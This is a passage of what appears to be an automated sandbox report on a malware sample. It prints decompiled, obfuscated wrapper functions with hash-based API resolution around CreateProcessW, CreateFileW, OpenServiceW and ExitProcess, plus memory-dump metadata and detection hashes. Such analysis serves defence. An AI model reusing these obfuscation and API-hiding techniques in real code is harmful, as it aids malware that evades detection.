				_v20 = _v20 ^ 0x003ae9c9;
				E00CF2309(0x2e4, _t65, _t65, 0xbf8568a3, _t65, 0x9c9047d0);
				_t63 = CreateProcessW(_t71, _a16, 0, 0, _a52, 0, 0, 0, _a28, _a48); // executed
				return _t63;
			}

0x00d131da
0x00d131df
0x00d131e1
0x00d131e4
0x00d131e7
0x00d131e8
0x00d131e9
0x00d131ec
0x00d131ef
0x00d131f2
0x00d131f3
0x00d131f4
0x00d131f7
0x00d131fa
0x00d131fd
0x00d131fe
0x00d13200
0x00d13205
0x00d1320f
0x00d13214
0x00d1321b
0x00d1321f
0x00d13223
0x00d1322a
0x00d13231
0x00d13235
0x00d13241
0x00d13249
0x00d1324c
0x00d13253
0x00d1325a
0x00d1325e
0x00d13265
0x00d1326c
0x00d13273
0x00d1327a
0x00d13281
0x00d132a1
0x00d132bb
0x00d132c2

APIs

CreateProcessW.KERNEL32(000C0354,?,00000000,00000000,?,00000000,00000000,00000000,229292B4,?), ref: 00D132BB

Memory Dump Source

Source File: 00000002.00000002.352217947.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: true

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction ID: 39c2db180e3ade19ee9a1452e935e3b736a0b7febfd4b3a65aaf20d159f433fd
Opcode Fuzzy Hash: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction Fuzzy Hash: A4311672801248BBCF65DF96CD49CDFBFB5FB89704F108188F91462220D3B58A64DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D0199D, Relevance: 1.6, APIs: 1, Instructions: 71
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00D0199D(void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, long _a20, long _a24, long _a28, long _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t55;
				void* _t68;
				signed int _t69;
				signed int _t70;

				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				E00D12523(_t55);
				_v12 = 0xd4f63c;
				_v12 = _v12 >> 7;
				_v12 = _v12 << 0xf;
				_v12 = _v12 + 0xffffff46;
				_v12 = _v12 ^ 0xd4fb5fe8;
				_v8 = 0x967d18;
				_v8 = _v8 + 0xffffef98;
				_t69 = 0x14;
				_v8 = _v8 / _t69;
				_t70 = 0x4a;
				_v8 = _v8 / _t70;
				_v8 = _v8 ^ 0x000a0722;
				_v20 = 0x4653bc;
				_v20 = _v20 * 0x70;
				_v20 = _v20 ^ 0x1ec2604c;
				_v16 = 0x7577a9;
				_v16 = _v16 * 0x3c;
				_v16 = _v16 ^ 0x1b87e59a;
				E00CF2309(0x10a, _t70, _t70, 0xb484d458, _t70, 0x9c9047d0);
				_t68 = CreateFileW(_a4, _a24, _a28, 0, _a32, _a20, 0); // executed
				return _t68;
			}

0x00d019a6
0x00d019a7
0x00d019aa
0x00d019ad
0x00d019b0
0x00d019b3
0x00d019b6
0x00d019b9
0x00d019bc
0x00d019bf
0x00d019c3
0x00d019c4
0x00d019c9
0x00d019d3
0x00d019d9
0x00d019dd
0x00d019e4
0x00d019eb
0x00d019f2
0x00d019fe
0x00d01a03
0x00d01a0b
0x00d01a13
0x00d01a16
0x00d01a1d
0x00d01a30
0x00d01a38
0x00d01a3f
0x00d01a4a
0x00d01a4d
0x00d01a60
0x00d01a79
0x00d01a7f

APIs

CreateFileW.KERNEL32(D4FB5FE8,?,?,00000000,?,?,00000000), ref: 00D01A79

Memory Dump Source

Source File: 00000002.00000002.352217947.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: true

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8a2d25935346c61c613306e80470cb2899605f47af9ce82126dccb95390cfdca
Instruction ID: f6661b190d5f98d4342a8ddd562a4c4035f40c037fe82df6a7c151e1a1e791a5
Opcode Fuzzy Hash: 8a2d25935346c61c613306e80470cb2899605f47af9ce82126dccb95390cfdca
Instruction Fuzzy Hash: DE21E27280021DFBDF05DF95D8498DEBFB6EF49354F108188FA1466260D3B69A61AF90

Uniqueness

Uniqueness Score: -1.00%

Function 00CF2985, Relevance: 1.6, APIs: 1, Instructions: 58
memoryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00CF2985(long __ecx, long __edx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t43;
				void* _t53;
				signed int _t55;
				long _t60;
				long _t61;

				_push(_a12);
				_t60 = __edx;
				_t61 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00D12523(_t43);
				_v20 = 0x610f25;
				_v20 = _v20 ^ 0x98bdb346;
				_v20 = _v20 >> 3;
				_v20 = _v20 ^ 0x13199c72;
				_v16 = 0x24641b;
				_t55 = 0x72;
				_v16 = _v16 * 0x35;
				_v16 = _v16 ^ 0xfebd96de;
				_v16 = _v16 ^ 0xf931a9e3;
				_v12 = 0x6331a9;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 / _t55;
				_v12 = _v12 ^ 0x0006f398;
				_v8 = 0x8145a8;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 << 0xd;
				_v8 = _v8 + 0x8268;
				_v8 = _v8 ^ 0x0405b518;
				E00CF2309(_t55 + 0x5d, _t55, _t55, 0x9d19c04e, _t55, 0x9c9047d0);
				_t53 = RtlAllocateHeap(_a8, _t60, _t61); // executed
				return _t53;
			}

0x00cf298d
0x00cf2990
0x00cf2992
0x00cf2994
0x00cf2997
0x00cf299a
0x00cf299b
0x00cf299c
0x00cf29a1
0x00cf29ab
0x00cf29b4
0x00cf29b8
0x00cf29bf
0x00cf29cc
0x00cf29d3
0x00cf29d6
0x00cf29dd
0x00cf29e4
0x00cf29eb
0x00cf29f9
0x00cf29fc
0x00cf2a03
0x00cf2a0a
0x00cf2a0e
0x00cf2a12
0x00cf2a19
0x00cf2a31
0x00cf2a3e
0x00cf2a45

APIs

RtlAllocateHeap.NTDLL(F931A9E3,01AD2A76,65B9EDAF,?,?,?,?,?,?,?,?,00000000,229292B5), ref: 00CF2A3E

Memory Dump Source

Source File: 00000002.00000002.352217947.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: true

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 138a33bbf657fc90b6a1f11ed01e494c992cf007267dd6aff1ee16601a01d635
Instruction ID: 66960cf77de8ac75d2fd64551359e318a112cf471d7183f34d435d2bb27ed519
Opcode Fuzzy Hash: 138a33bbf657fc90b6a1f11ed01e494c992cf007267dd6aff1ee16601a01d635
Instruction Fuzzy Hash: 0F213672D0020DBBDF18DFA5D84A8DEBFB5FB41714F108098E815A6210D7B56B55DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00D0A1D9, Relevance: 1.6, APIs: 1, Instructions: 57
serviceCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00D0A1D9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, int _a16, short* _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t48;
				void* _t60;
				signed int _t62;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				E00D12523(_t48);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v32 = 0xc7e348;
				_v20 = 0x108854;
				_v20 = _v20 + 0xffffaa5a;
				_v20 = _v20 ^ 0x0016e205;
				_v12 = 0x2fa6a1;
				_v12 = _v12 ^ 0x32ad7830;
				_t62 = 5;
				_v12 = _v12 * 0x54;
				_v12 = _v12 ^ 0x92f839ec;
				_v16 = 0x6695de;
				_v16 = _v16 * 0x61;
				_v16 = _v16 ^ 0x26d3982b;
				_v8 = 0xfe457a;
				_v8 = _v8 * 0x1c;
				_v8 = _v8 / _t62;
				_v8 = _v8 + 0xffffd7e2;
				_v8 = _v8 ^ 0x058c81d4;
				E00CF2309(0x229, _t62, _t62, 0x540b902b, _t62, 0x21ce39be);
				_t60 = OpenServiceW(_a12, _a20, _a16); // executed
				return _t60;
			}

0x00d0a1df
0x00d0a1e2
0x00d0a1e5
0x00d0a1e8
0x00d0a1eb
0x00d0a1f0
0x00d0a1f5
0x00d0a1fc
0x00d0a202
0x00d0a209
0x00d0a210
0x00d0a217
0x00d0a21e
0x00d0a225
0x00d0a232
0x00d0a239
0x00d0a23c
0x00d0a243
0x00d0a255
0x00d0a258
0x00d0a25f
0x00d0a26a
0x00d0a277
0x00d0a27a
0x00d0a281
0x00d0a294
0x00d0a2a5
0x00d0a2aa

APIs

OpenServiceW.ADVAPI32(0016E205,00000000,00000000), ref: 00D0A2A5

Memory Dump Source

Source File: 00000002.00000002.352217947.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: true

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 840192035c919cdef4810d782994658ce17bfcf84a61f68bdcf29756b0cc9f76
Instruction ID: a049b5e93d1ceaab5a9ab7542a2dc624bc1f2a95b699ebb9a024ebad6f06d509
Opcode Fuzzy Hash: 840192035c919cdef4810d782994658ce17bfcf84a61f68bdcf29756b0cc9f76
Instruction Fuzzy Hash: 852128B1C0020DFFCF04DFA8D9469AEBBB5EB44300F108199E914A6260D7715B649F50

Uniqueness

Uniqueness Score: -1.00%

Function 00D07708, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00D077B6

Memory Dump Source

Source File: 00000002.00000002.352217947.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: true

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 793664888eb73d009d9e5b6ba31e7172053ff3348b2e2b85015c814eee7fae41
Instruction ID: 61fc456e0690187b6eedc3a91b08217238cd02cb71ce5f32f523a9eee3434892
Opcode Fuzzy Hash: 793664888eb73d009d9e5b6ba31e7172053ff3348b2e2b85015c814eee7fae41
Instruction Fuzzy Hash: 551137B2D0020DFBDB08DFA4D9469EEBBB4FF44304F108189E814A7251D7B19B109FA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CF4248, Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CF4248() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _t52;
				signed int _t53;

				_v24 = _v24 & 0x00000000;
				_v32 = 0xac8d12;
				_v28 = 0x59a528;
				_v12 = 0xae5295;
				_v12 = _v12 << 2;
				_t52 = 0xb;
				_v12 = _v12 / _t52;
				_v12 = _v12 ^ 0x0038a8c1;
				_v20 = 0xfd2184;
				_v20 = _v20 ^ 0xb7361747;
				_v20 = _v20 ^ 0xb7cc531f;
				_v8 = 0xac9b8;
				_t53 = 9;
				_v8 = _v8 / _t53;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x00077309;
				_v16 = 0x4164cf;
				_v16 = _v16 << 2;
				_v16 = _v16 ^ 0x010bebe7;
				E00CF2309(0x37f, _t53, _t53, 0x8b1a77d6, _t53, 0x9c9047d0);
				ExitProcess(0);
			}

0x00cf424e
0x00cf4254
0x00cf425b
0x00cf4262
0x00cf4269
0x00cf4272
0x00cf4277
0x00cf427c
0x00cf4283
0x00cf428a
0x00cf4291
0x00cf4298
0x00cf42a2
0x00cf42aa
0x00cf42ad
0x00cf42b1
0x00cf42b5
0x00cf42bc
0x00cf42c3
0x00cf42c7
0x00cf42e7
0x00cf42f1

APIs

ExitProcess.KERNEL32(00000000), ref: 00CF42F1

Memory Dump Source

Source File: 00000002.00000002.352217947.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: true

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction ID: d67d8529f2c03aed9488ce9e604b95b85eb22bd60e805dc3c481b389374e2234
Opcode Fuzzy Hash: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction Fuzzy Hash: 8C1128B5E00208EBDB44DFE5D94AAEEBBF1FB44308F208089E515A7240D7B45B18DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00D0A566, Relevance: 1.5, APIs: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00D0A566(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t31;
				int _t39;

				_push(_a4);
				_push(__ecx);
				E00D12523(_t31);
				_v20 = 0xa80c31;
				_v20 = _v20 * 0x6c;
				_v20 = _v20 ^ 0x46e6f799;
				_v16 = 0x35d7e6;
				_v16 = _v16 << 0xd;
				_v16 = _v16 ^ 0xbafefac0;
				_v12 = 0x55f9ae;
				_v12 = _v12 + 0xffffbfa6;
				_v12 = _v12 | 0xf8d2795e;
				_v12 = _v12 ^ 0xf8daa7f9;
				_v8 = 0xe46cfe;
				_v8 = _v8 ^ 0xeb94df75;
				_v8 = _v8 | 0xf69b0666;
				_v8 = _v8 ^ 0xfffa92dc;
				E00CF2309(0x148, __ecx, __ecx, 0x2237d547, __ecx, 0x9c9047d0);
				_t39 = FindCloseChangeNotification(_a4); // executed
				return _t39;
			}

0x00d0a56c
0x00d0a570
0x00d0a571
0x00d0a576
0x00d0a58a
0x00d0a58d
0x00d0a594
0x00d0a59b
0x00d0a59f
0x00d0a5a6
0x00d0a5ad
0x00d0a5b4
0x00d0a5bb
0x00d0a5c2
0x00d0a5c9
0x00d0a5d0
0x00d0a5d7
0x00d0a5f6
0x00d0a601
0x00d0a606

APIs

FindCloseChangeNotification.KERNEL32(F8DAA7F9), ref: 00D0A601

Memory Dump Source

Source File: 00000002.00000002.352217947.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: true

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 2512bc8cf98a9556459c8d1695ff192ee3e01f460f93b2f36ca59e351fe401b9
Instruction ID: 3d2e90e352b5d772233d3d5d7942a9b6ebc70b9878a2a4741e3a1716dbb471bd
Opcode Fuzzy Hash: 2512bc8cf98a9556459c8d1695ff192ee3e01f460f93b2f36ca59e351fe401b9
Instruction Fuzzy Hash: 361127B5C0030CFBCB18DFA8D8868AEBBB4EF44304F108588A855A2261D3756B148F91

Uniqueness

Uniqueness Score: -1.00%

Function 6E9DB2C4, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 6E9DCCCD: HeapAlloc.KERNEL32(00000008,000000FF,00000000,?,6E9DA438,00000001,00000364,FFFFFFFF,000000FF,?,6E9D731A,000000FF,000000FF), ref: 6E9DCD0E

_free.LIBCMT ref: 6E9DB2E4

Part of subcall function 6E9D9B98: HeapFree.KERNEL32(00000000,00000000,?,6E9D731A,000000FF,000000FF), ref: 6E9D9BAE
Part of subcall function 6E9D9B98: GetLastError.KERNEL32(6E9D6995,?,6E9D731A,000000FF,000000FF), ref: 6E9D9BC0

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocErrorFreeLast_free
String ID:
API String ID: 3091179305-0
Opcode ID: dada6c411b579cb9446f72d1da6f7f9291066411e0aea1cba2727085d348e2df
Instruction ID: e038be59ccb2699fe8f5753debd74d26f4a6e81791b91030e25aa1b2dbfadf83
Opcode Fuzzy Hash: dada6c411b579cb9446f72d1da6f7f9291066411e0aea1cba2727085d348e2df
Instruction Fuzzy Hash: 5DF03CB2A01A15AFC710DFA9C441B9AB7F8EF48710F108566ED18DB340E771E9148BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6E9D9BD2, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6E9C8F9C,00000105,000000FF,24448D6E,00000000,?,6E9B1687,?,00000103,000000FF), ref: 6E9D9C04

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9497aaf969b04f68ebfc1e531b91fa75182a7cf5c9283132c9893c179e56f396
Instruction ID: 2860af6de7ddc596e11ff2021fbe4b83c202fb04f4f76032a4a5fbeaba05fff0
Opcode Fuzzy Hash: 9497aaf969b04f68ebfc1e531b91fa75182a7cf5c9283132c9893c179e56f396
Instruction Fuzzy Hash: 0AE0E531544E325AEA513AF68C7078E368C9F432A8F028920ED1CA6584DFA1D489CEE8

Uniqueness

Uniqueness Score: -1.00%

Function 00D017CB, Relevance: 1.3, APIs: 1, Instructions: 56
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00D017CB(WCHAR* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t44;
				int _t55;
				signed int _t57;
				WCHAR* _t62;

				_push(_a8);
				_t62 = __ecx;
				_push(_a4);
				_push(__ecx);
				E00D12523(_t44);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x2c5dd9;
				_v28 = 0x29a411;
				_v16 = 0xb6013c;
				_v16 = _v16 >> 2;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x05bceb0d;
				_v12 = 0xa7496a;
				_t57 = 7;
				_v12 = _v12 * 0x55;
				_v12 = _v12 | 0x1a205192;
				_v12 = _v12 ^ 0x3fab9f8f;
				_v8 = 0xf5055a;
				_v8 = _v8 / _t57;
				_v8 = _v8 + 0xa16;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 ^ 0x1132ba81;
				_v20 = 0xaea409;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x2ba3ef66;
				E00CF2309(0xb8, _t57, _t57, 0xbf157248, _t57, 0x9c9047d0);
				_t55 = lstrcmpiW(_t62, _a8); // executed
				return _t55;
			}

0x00d017d2
0x00d017d5
0x00d017d7
0x00d017db
0x00d017dc
0x00d017e1
0x00d017e8
0x00d017f1
0x00d017f8
0x00d017ff
0x00d01803
0x00d01807
0x00d0180e
0x00d0181b
0x00d01822
0x00d01825
0x00d0182c
0x00d01833
0x00d01844
0x00d01847
0x00d01859
0x00d0185c
0x00d01863
0x00d0186a
0x00d0186e
0x00d01881
0x00d0188d
0x00d01893

APIs

lstrcmpiW.KERNEL32(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 00D0188D

Memory Dump Source

Source File: 00000002.00000002.352217947.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: true

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction ID: 64bbe3d6ba869cd74f78cf5ec34b0836ad635bf255b255279268ffc1b900a81c
Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction Fuzzy Hash: 852124B5D0020CFFDB08DFA4D94A9EEBBB5EB44304F208189E425B7250E3B56B149FA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E9BF700, Relevance: 38.9, APIs: 19, Strings: 3, Instructions: 404stringmemoryCOMMON

Download Yara Rule

APIs

CoTaskMemAlloc.OLE32(6E9BED98,7BDA3107,00000000,00000000), ref: 6E9BF79A
_wcsstr.LIBVCRUNTIME ref: 6E9BF806
CharNextW.USER32(?,00000000), ref: 6E9BF819
CharNextW.USER32(00000000,?,00000000), ref: 6E9BF81E
CharNextW.USER32(00000000,?,00000000), ref: 6E9BF823
CharNextW.USER32(00000000,?,00000000), ref: 6E9BF828
CharNextW.USER32(?,?,7BDA3107,00000000,00000000), ref: 6E9BF85F
CharNextW.USER32(?,?,7BDA3107,00000000,00000000), ref: 6E9BF86F
CharNextW.USER32(00000000,?,7BDA3107,00000000,00000000), ref: 6E9BF8CE
CoTaskMemFree.OLE32(00000000,7BDA3107,00000000,00000000), ref: 6E9BF8F3
lstrcmpiW.KERNEL32(?,?,?,7BDA3107,00000000,00000000), ref: 6E9BF94E
CoTaskMemFree.OLE32(00000000,?,7BDA3107,00000000,00000000), ref: 6E9BF966
CharNextW.USER32(?,?,7BDA3107,00000000,00000000), ref: 6E9BF9B3
CharNextW.USER32(?,7BDA3107,00000000,00000000), ref: 6E9BF9C3
CoTaskMemFree.OLE32(00000000,?,7BDA3107,00000000,00000000), ref: 6E9BF9E5
CoTaskMemFree.OLE32(00000000,7BDA3107,00000000,00000000), ref: 6E9BFA03
lstrcmpiW.KERNEL32(?,6E9F8D3C,?,?,C000008C,00000000,00000000), ref: 6E9BFABD
CoTaskMemFree.OLE32(00000000,C000008C,00000000,00000000), ref: 6E9BFADC
CharNextW.USER32(?,?,00000000,00000000,00000000,?,?,C000008C,00000000,00000000), ref: 6E9BFBA1

Strings

HKCU{Software{Classes, xrefs: 6E9BF82A
HKCR, xrefs: 6E9BF800
}}, xrefs: 6E9BF8B0

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$Task$Free$lstrcmpi$Alloc_wcsstr
String ID: }}$HKCR$HKCU{Software{Classes
API String ID: 2771584749-1142484189
Opcode ID: baaef82a1eddf1291e188a67eab1332d928c793159569df094bb5a5b2d4ad84b
Instruction ID: dd5cf1ce734ab35c90d753cc34a0cc1692e4e5c69699ece4cd50308f6e6f6995
Opcode Fuzzy Hash: baaef82a1eddf1291e188a67eab1332d928c793159569df094bb5a5b2d4ad84b
Instruction Fuzzy Hash: 97E1B13990421A9FDB149FE8CCA479FB7B8EF55308F204569E906EB244EB30D944CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C1CD0, Relevance: 26.7, APIs: 12, Strings: 3, Instructions: 462COMMON

Download Yara Rule

APIs

PdhCollectQueryData.PDH(?,7BDA3107,?,?,?,?,6E9E9DAB,000000FF), ref: 6E9C1D77
PdhGetFormattedCounterValue.PDH(?,00000200,00000000,?,?,?,6E9E9DAB,000000FF), ref: 6E9C1DE1
GetTextMetricsW.GDI32(?,?,00000010,?), ref: 6E9C1F40
GetClientRect.USER32 ref: 6E9C224B
GetDeviceCaps.GDI32(?,0000005A), ref: 6E9C22C0
MulDiv.KERNEL32(?,00000000,00000048), ref: 6E9C22D5
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 6E9C22FA
SetTextColor.GDI32(?,?), ref: 6E9C2312
SelectObject.GDI32(?,00000000), ref: 6E9C231A
DrawTextW.USER32(?,?,?,?,00000000), ref: 6E9C2356
SelectObject.GDI32(?,00000000), ref: 6E9C2363
DeleteObject.GDI32(00000000), ref: 6E9C236A

Strings

%s%d.%d%s, xrefs: 6E9C2198
%s%s%s, xrefs: 6E9C21F2
[N/A], xrefs: 6E9C2117

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectText$Select$CapsClientCollectColorCounterCreateDataDeleteDeviceDrawFontFormattedMetricsQueryRectValue
String ID: %s%d.%d%s$%s%s%s$[N/A]
API String ID: 4229994797-711029782
Opcode ID: 50ff99ee67353e9cd94fafb72e4cfd785924bdb8a2cd0e470ddc03ac971eab97
Instruction ID: 7d2c4f96e38ed4c006f5ac85561b0a34e8db1bc6f375092c3ccda5903e7eca5c
Opcode Fuzzy Hash: 50ff99ee67353e9cd94fafb72e4cfd785924bdb8a2cd0e470ddc03ac971eab97
Instruction Fuzzy Hash: E11269719006299BDB64DF54CC80ADAB3B9FF49704F1442D9E509A7261DB30EEC5CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B5EE0, Relevance: 19.9, APIs: 13, Instructions: 427threadclipboardCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?,0000002E,00000000,?,?,?,?,?,?,6E9B6935), ref: 6E9B6183
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E9B61A1
AnyPopup.USER32 ref: 6E9B6305
GetCurrentThread.KERNEL32 ref: 6E9B6401

Part of subcall function 6E9B5A30: IsSystemResumeAutomatic.KERNEL32 ref: 6E9B5BA0

GetUserDefaultUILanguage.KERNEL32(00000000,?,0000002E,00000000,?,?,?,?,?,?,6E9B6935), ref: 6E9B6355

Part of subcall function 6E9B5A30: GetOpenClipboardWindow.USER32(00000000,?,00000000,6E9B6431,0000002E,00000000,00000000,?,0000002E,00000000), ref: 6E9B5A3C
Part of subcall function 6E9B5A30: CloseClipboard.USER32 ref: 6E9B5A73
Part of subcall function 6E9B5A30: GetMenuCheckMarkDimensions.USER32 ref: 6E9B5B30

GetErrorMode.KERNEL32(0000002E,00000000,?,?,?,?,?,?,6E9B6935), ref: 6E9B6448
GetThreadErrorMode.KERNEL32(?,?,?,?,?,?,6E9B6935), ref: 6E9B64B0
GetClipboardViewer.USER32 ref: 6E9B5F76

Part of subcall function 6E9B5C20: UnregisterApplicationRestart.KERNEL32 ref: 6E9B5C40
Part of subcall function 6E9B5C20: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E9B5CAC

GetSystemDefaultLangID.KERNEL32 ref: 6E9B5FE3
GetOpenClipboardWindow.USER32(?,-00000003,00000000,?,?,?,?,?,?,6E9B6935), ref: 6E9B6052
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E9B6081
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E9B6108
GetCurrentThread.KERNEL32 ref: 6E9B612E

Part of subcall function 6E9B5D90: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E9B5E04
Part of subcall function 6E9B5D90: SwitchToThread.KERNEL32(00000000,?,?,?,?,?,?), ref: 6E9B5E74
Part of subcall function 6E9B5D90: GetOpenClipboardWindow.USER32(00000000,?,?,?), ref: 6E9B5E93
Part of subcall function 6E9B5D90: GetACP.KERNEL32(00000000,?,?,?), ref: 6E9B5EA4

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ClipboardUnothrow_t@std@@@__ehfuncinfo$??2@$ThreadWindow$Open$CurrentDefaultErrorModeSystem$ApplicationAutomaticCheckCloseDimensionsForegroundLangLanguageMarkMenuPopupRestartResumeSwitchUnregisterUserViewer
String ID:
API String ID: 2542842856-0
Opcode ID: b6646f5b58d7f80f9bfa0e60e0b3ae404f216fe52b82e31a4d4fb5439bb129e4
Instruction ID: 6e0f75ff34d02586ccdb063075acf00904efa514bd4cb7fc457f48743792a646
Opcode Fuzzy Hash: b6646f5b58d7f80f9bfa0e60e0b3ae404f216fe52b82e31a4d4fb5439bb129e4
Instruction Fuzzy Hash: AFE1D971D24F444AD317DEB684111ABF3AF6FEB6D4F048B2AF446B6152FB24E8D28940

Uniqueness

Uniqueness Score: -1.00%

